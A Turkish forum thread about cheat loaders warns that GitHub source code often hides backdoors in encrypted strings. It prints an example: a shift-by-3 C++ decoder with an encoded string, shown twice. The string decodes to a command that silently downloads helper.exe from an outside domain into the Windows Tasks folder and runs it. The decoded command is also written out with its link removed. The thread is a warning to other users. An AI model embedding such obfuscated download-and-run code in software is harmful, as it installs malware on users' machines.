Neler yeni

Githubdan indirilen hazır sourceler hakkında

A

ahmetcevik

Uzman Üye
Katılım
13 Ocak 2022
Mesajlar
697
Beğeniler
116
İletişim
çoğu loader yapımcısı githubdan indirdikleri sourceleri base alarak başlıyor evet bu normal bir şey fakat

zaten cheatglobalinde yaptığı uyarı gibi kullanılan sourcelerde şifrelenmiş metinler halinde backdoorlar buluyor

bir kod örneği
std::string _cstr_(const std::string& rndcrypt, int shift) {
std::string _debogInt;
for (char c : rndcrypt) { _debogInt += static_cast<char>(c - shift); }
return _debogInt;
}
std::string rndcrypt = "fxuo#00vlohqw#kwwsv=22dwkhudsurmhfw1vkrs2grzqordg2khoshu1h{h#00rxwsxw#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h#Aqxo#5A)4#))#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h";
std::string _debogInt = _cstr_(rndcrypt, 3);


sourceleri böyle yerleştiriyorlar peki ya üstteki örnekte bu kod ne yapıyor ?

curl --silent
Linkleri görebilmek için kayıt olmanız gerekmektedir
indirmesin diye bu kısmı sildim./helper.exe --output C:\Windows\System32\Tasks\helper.exe >nul 2>&1 && C:\Windows\System32\Tasks\helper.exe

böyle şifrelenmiş metinler genelde hazır protected keyauth,fluxauth veya herhangi bir hazır auth üzerine oluyor

umarım bu kodu kendi sourcelerinde kullanan olmaz dikkatli ve saglıklı kalın.

ayrıca
Linkleri görebilmek için kayıt olmanız gerekmektedir
adresinden herhangi bir şey indirmeyin.
 
ahmetcevik' Alıntı:
çoğu loader yapımcısı githubdan indirdikleri sourceleri base alarak başlıyor evet bu normal bir şey fakat

zaten cheatglobalinde yaptığı uyarı gibi kullanılan sourcelerde şifrelenmiş metinler halinde backdoorlar buluyor

bir kod örneği
std::string _cstr_(const std::string& rndcrypt, int shift) {
std::string _debogInt;
for (char c : rndcrypt) { _debogInt += static_cast<char>(c - shift); }
return _debogInt;
}
std::string rndcrypt = "fxuo#00vlohqw#kwwsv=22dwkhudsurmhfw1vkrs2grzqordg2khoshu1h{h#00rxwsxw#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h#Aqxo#5A)4#))#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h";
std::string _debogInt = _cstr_(rndcrypt, 3);


sourceleri böyle yerleştiriyorlar peki ya üstteki örnekte bu kod ne yapıyor ?

curl --silent
Linkleri görebilmek için kayıt olmanız gerekmektedir
indirmesin diye bu kısmı sildim./helper.exe --output C:\Windows\System32\Tasks\helper.exe >nul 2>&1 && C:\Windows\System32\Tasks\helper.exe

böyle şifrelenmiş metinler genelde hazır protected keyauth,fluxauth veya herhangi bir hazır auth üzerine oluyor

umarım bu kodu kendi sourcelerinde kullanan olmaz dikkatli ve saglıklı kalın.

ayrıca
Linkleri görebilmek için kayıt olmanız gerekmektedir
adresinden herhangi bir şey indirmeyin.
Genişletmek için tıkla ...
hazir keyauth.cc apili bedava indir auth sistemli loader:cryangry:
 
sakat ya dikkatli bakmak lazım load ederken icerisinde rat varsa pc gg zaten
 
githubdan direkt source ındırmemenız daha faydalı olabılır
 
aslında github eğitim amaçlı kullanılabilecek bir yer ama insanlar kaynak kodlarını aldığı gibi kurmaya çalıştığı için böyle şeyler oluyor aynı sorundan sen de muzdariptin hatırlarsan öyle yapmamak lazım iyice inceleyip tek tek içinden alınacak bir şey varsa almak lazım
 
fantasy' Alıntı:
aslında github eğitim amaçlı kullanılabilecek bir yer ama insanlar kaynak kodlarını aldığı gibi kurmaya çalıştığı için böyle şeyler oluyor aynı sorundan sen de muzdariptin hatırlarsan öyle yapmamak lazım iyice inceleyip tek tek içinden alınacak bir şey varsa almak lazım
Genişletmek için tıkla ...
yaklaşık bir kaç yıl önce evet. O zamanlar tabi ki çok yoktu böyle şeyler fakat neredeyse suan tüm sourceler öyle dediğin gibi ihtiyacı oldugu şeyi içinden inceleyip alması daha doğru bu konu da bilmeyenleri uyarmak için zaten
 
Öğretici ve güzel bir konu olmuş yeni başlayanlar için ideali, teşekkürler^^
 
Cevap yazmak için giriş yap yada kayıt ol.

  Şuanda konuyu görüntüleyen kullanıcılar

Toplam: 2 (Kullanıcı: 0, ziyaretçi: 2)

Üst Alt